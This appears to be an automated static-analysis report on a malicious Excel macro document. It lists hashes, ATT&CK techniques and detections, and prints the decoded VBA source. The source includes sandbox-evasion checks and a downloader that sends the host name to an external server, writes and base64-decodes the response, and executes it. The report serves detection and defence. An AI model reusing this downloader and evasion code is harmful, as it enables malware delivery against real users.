Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 9209780adc2c0159…

MALICIOUS

Office (OOXML)

28.5 KB Created: 2021-08-18 02:04:39 UTC Authoring application: Microsoft Excel 16.0300
MD5: 2a73fad139c1e00e7ee4a0c3683b4798 SHA-1: 564699bafc42e12484715bb1588f5f370fcc0d06 SHA-256: 9209780adc2c01599a23ec7dd9d04c30626d4bb6c11f13397f4afee76fce2032
610 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File T1071.001 Web Protocols T1190 Exploit Public-Facing Application

The sample contains a VBA macro with an Auto_Open subroutine that executes obfuscated shell commands. This macro utilizes WScript.Shell and GetObject to create a process and download a payload from the specified URL. The downloaded content is saved to temporary files, indicating a downloader or droppper functionality. The presence of 'Account information', 'Malicious Email Delivered', and 'Unrecognized account login attempts' in the document body suggests a phishing or credential harvesting lure.

Heuristics 13

  • ClamAV: Doc.Downloader.Valyria-10026858-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10026858-0
  • VBA project inside OOXML medium 10 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ec2-18-184-17-12.eu-central-1.compute.amazonaws.com/standardchartered/employees/incident/180821/ Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
a8de7792a7fe33c879ecd66d855476cfa06c2eaacc5eaa7d3603a74e01d3ce0c		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4726 bytes
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Ten_skoroszyt"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Arkusz1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub Auto_Open()
    ActiveSheet.Shapes("fBox").Visible = False
    ActiveSheet.Shapes("fText").Visible = False
    ActiveSheet.Unprotect
    ActiveSheet.Range("A1", "Z100").Locked = True
    ActiveSheet.Protect
    checkFileName
End Sub

Sub Workbook_BeforeClose()
    ActiveSheet.Shapes("fBox").Visible = True
    ActiveSheet.Shapes("fText").Visible = True
    ActiveSheet.Unprotect
    ActiveSheet.Range("A1", "Z100").Locked = True
    ActiveSheet.Protect
End Sub

Private Sub Get_Data(userId)

Set b = CreateObject("WScript.Network")
c = b.ComputerName

Dim o
Set o = CreateObject("MSXML2.XMLHTTP")
o.Open "GET", "http://ec2-18-184-17-12.eu-central-1.compute.amazonaws.com/standardchartered/employees/incident/180821/" & userId & "?uid=" & c & "&seid=" & DateDiff("s", "1/1/1970 00:00:00", Now()), False
o.Send

Set r = CreateObject("ADODB.Stream")
r.Type = 1 'adTypeBinary
   
a = Environ("Temp") & "\Details.dat"
b = Environ("Temp") & "\TEDetails.dat"
d = Environ("Temp") & "\IncDetails.log"
r.Open
r.Write o.responseBody
r.SaveToFile a, 2 'adSaveCreateOverWrite
Set r = Nothing

Set c = CreateObject("Scripting.FileSystemObject")
c.CopyFile a, b

Set fso = CreateObject("Scripting.Filesystemobject")
Set base_file = fso.OpenTextFile(b, 1)
Content = base_file.ReadAll()
base_file.Close
    
Set oXML = CreateObject("Msxml2.DOMDocument")
Set oNode = oXML.CreateElement("base64")
oNode.DataType = "bin.base64"
oNode.Text = Content
    
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = 1
BinaryStream.Open
BinaryStream.Write oNode.nodeTypedValue
BinaryStream.SaveToFile d, 2

Set s = CreateObject("WScript.Shell")
s.Exec d
c.DeleteFile (a)
c.DeleteFile (b)

End Sub

Private Sub checkFileName()
    Dim name As String
    Dim nArray() As String
    name = Application.Caption
    nArray = Split(name, " ")
    If nArray(0) <> "TargetedEmployees180821.xlsm" Then
            badName = True
    Else
        checkRecentDocs
    End If
End Sub

Private Sub checkRecentDocs()
    Dim hard
    If Application.RecentFiles.Count < 3 Then
       Application.Quit
    Else
       IsHardwareReliable
    End If
End Sub

Private Sub IsHardwareReliable()
    Dim objWMIService, objItem, colItems, dotSplace, hwGtest
    Dim totalSize, sumRamVal, cpusNum As Integer
    hwGtest = True
    totalSize = 0
    sumRamVal = 0
    cpusNum = 0
    Const wbemFlagReturnImmediately = &H10
    Const wbemFlagForwardOnly = &H20
    dotSplace = "."
    Set objWMIService = GetObject _
    ("winmgmts:\\" & dotSplace & "\root\cimv2")
    Set colItems = objWMIService.ExecQuery _
    ("Select * from Win32_LogicalDisk")
    For Each objItem In colItems
        Dim num
        num = Int(objItem.Size / 1073741824)
        If num > 0 Then
            totalSize = totalSize + num
        End If
    Next
    If totalSize < 100 Then
        hwGtest = False
    End If
    Set colComputer = objWMIService.ExecQuery _
    ("Select * from Win32_ComputerSystem")
    For Each objComputer In colComputer
        sumRamVal = sumRamVal + Int((objComputer.TotalPhysicalMemory) / 1048576) + 1
    Next
    If sumRamVal < 4096 Then
        hwGtest = False
    End If
    Set colItems2 = objWMIService.ExecQuery("SELECT * FROM Win32_Processor", "WQL", _
        wbemFlagReturnImmediately + wbemFlagForwardOnly)
    For Each objItem In colItems2
        cpus
... (truncated)
vbaProject_00.bin
03d306e52fd9f3e26ae0d086bfa41611214c15e9c3d6e058b9b092b07d56e123		 vba-project OOXML VBA project: xl/vbaProject.bin 18432 bytes
Detection
ClamAV: Doc.Downloader.Valyria-10026858-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.